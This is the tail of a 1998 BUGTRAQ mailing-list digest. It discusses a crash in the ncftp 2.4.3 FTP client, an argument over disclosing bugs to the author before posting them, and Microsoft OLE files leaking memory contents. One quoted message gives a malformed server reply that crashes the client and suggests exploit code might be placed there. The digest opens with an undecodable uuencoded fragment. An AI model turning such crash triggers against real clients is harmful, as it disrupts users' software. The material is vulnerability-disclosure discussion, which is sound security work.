MKJPNR/.53#-2@5T"Z!XTX5L@F)6$K>;;R-DRB!G(?A3D\K7X=]]
MF(_-V7XLVT[%:9OEWJW"IC$3_C7U-3E]/NQ(@J#XXK
MCHQ+-\O:H-"A;\;0!4HZ4T;1C^)H#!_IUW62DB*HY:^:T7T9!RN%.V2V*,]&
M^I=(RJC+&\^6I/]I5_J_\N'X#WFX7W&,)^(__=6557O^M[&^0?<_UE?7_HS_
M_!%/=8S$YF61>T@W]J"7*^+TM;XM,K]'\U<4%"0AS,F8N26,TC4:Z=.W6V\\
M$_I7+_G2_LSQY-KC@R>7NE,P#[8YLFTIZ/[E\<
MGG)(O0YN8QMY#NAW(5+V[27G-K@:UU1^^RU5M_Z_G;O'`0@(PC#<.X5$-W'_
M\PGF?ZBW>9]&(FM60S',MQV6BO!7QJKX9Y.67*F](FT3E9`"ZR/Y41>E](Q\
M;63'V!F=!Y6ZQ\>PG)0Y.5W7Y_SJ(M^UY>;%9OL(&8D[S9D93S-LCIBD0O9B
DGW\2ROFVV,;_V7?1U8\4`````````````"QQ`7YYLP8`>```
`
end
------------------------------
Date: Mon, 22 Jun 1998 13:11:04 -0500
From: Mike Gleason
Subject: Re: ncftp 2.4.3 bug
At 09:57 AM 6/22/98 -0500, Shaw Terwilliger wrote:
>I hope you sent this to Mike Gleason before BugTraq...
Of course he didn't. It wouldn't do much good if I could post an official
patch before there was widespread exploitation of the bug. After all, the
more damage the bug causes, the more prestige he had to gain at my expense.
However, I do subscribe to this list, and had been working on this problem
(see below).
> you're not helping
>anyone by excluding the author from your audience. How do you think bugs
>are going to get fixed if you never tell the author [...] ?
Agreed. This is irresponsible and inexcusable behavior, especially
considering my e-mail address is displayed every single time you run the
program. But it'll keep happening too, as long as these self-appointed
security experts exist with their own agendas. Michael at Cygnus
experienced this problem with SN not too long ago, and of course I did as
well a few months ago.
> [...] Paul Boehm wrote:
>> i think i've found a bug in ncftp 2.4.3 (latest stable release)...
>> if you connect to a ftp server that responds with something like the
>> shit below ncftp2.4.3 segfaults. i think this is exploitable,
>> but had no time/motivation to look further into it.
>> every reply that looks like this works:
>> 331 a
>> 230 b
>> c[putting here some exploit code may work]
>> PS: i have no clue why this crashes ncftp... i haven't looked through
>> ncftp's source
>>but maybe someone else will.
Did you ever think that perhaps the author would?
He didn't seem to have enough time to make a cursory investigation to why
this happens or at least report it to me, but oddly he had plenty of time
to post to this list about it. At least the last guy spent enough time to
write an exploit to prove in fact that it was a bug and needed a fix ASAP.
As for this particular bug, it crashes because ncftp 2.x was trying to copy
from a NULL pointer. So, no buffer exploit. Version 3 (still beta)
handles it just fine. The official gospel is to upgrade to version 3,
since the bug doesn't occur naturally in the wild.
BTW, Thanks Shaw for making sure I knew about it. Luckily there are still
more responsible Netizens out there than not.
------------------------------
Date: Mon, 22 Jun 1998 10:00:45 -0700
From: Courteney van den Berg
Subject: Re: Microsoft Insecurity...
This is an OLE structured storage problem, not a Microsoft application
problem (although very few non-Microsoft apps use OLE structured
storage). It was fixed on Windows95 a long time ago by an OLE patch
(see MS KB article Q139432). Microsoft need a kick in the pants for
leaving such an old bug in their latest release of MAC OLE though. I
guess the MAC OLE source is probably based on an ancient version of the
PC OLE code.
CJ van den Berg
Computer Information Systems Department
CfaN
cjv@cfan.org
> -----Original Message-----
> From: Mike [mailto:mike@WOWDX.NET]
> Subject: Microsoft Insecurity...
>
> Well! After an overwhelming response from everyone, just a
> summery of the
> conclusions:
>
> 1. This is a Microsoft Application problem, from Word,
> excel, etc from way
> back as far as Word 2.0
>
> 2. This has been reported before to Microsoft, without any kind of
> response or patch, etc
>
> 3. The problem is that the Microsoft Applications take RAM or Buffer
> blocks to fill out application files - reading plaintext, etc,
> indiscriminately.
>
> 4. Suggestions to turn off the 'Fast Save' option help, but
> do not by any
> means eliminate the problem.
>
> 5. There is no other Fix - other than not attaching an application
> document to send to anyone who could possibly use it maliciously.
>
> 6. I think I have heard the opinions from everyone EXCEPT any sort of
> Microsoft rep, surprised?
>
> 7. It would be a simple fix of encrypting the 'fill'
> information with a
> simple MD5 encryption or something similar, just to eliminate
> any plaintext.
>
> Thanks to everyone for their suggestions and information....
>
> Cheers
>
> Mike
------------------------------
Date: Mon, 22 Jun 1998 22:03:21 +0200
From: Paul Boehm
Subject: Re: ncftp 2.4.3 bug
On Mon, Jun 22, 1998 at 01:11:04PM -0500, Mike Gleason wrote:
> >I hope you sent this to Mike Gleason before BugTraq...
>
> Of course he didn't. It wouldn't do much good if I could post an official
...
> However, I do subscribe to this list, and had been working on this problem
> (see below).
from my mail's header:
From: Paul Boehm
Subject: ncftp 2.4.3 bug
X-cc: mgleason@ncftp.com
To: BUGTRAQ@NETSPACE.ORG
i did CC you, but it's true i didn't send it to you before.
maybe that wasn't enough... i'll next time try to contact the
author of a buggy program before i post about it to a public list.
sorry, for causing too much noise on this list, but i thought
this mail to the list, as an explanation, was neccesary.
bye,
paul
--
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Name: Paul S. Boehm || Freelance Security Consulter.
Email: paul@is.destructive.org || PGPkey available at:
Url: http://paul.boehm.org/ || http://paul.boehm.org/paul-pgp.asc
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
There is is no reason for any individual to have a computer in their home.
--Ken Olsen (Digital Corp CEO) 1977.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
------------------------------
End of BUGTRAQ Digest - 19 Jun 1998 to 22 Jun 1998
**************************************************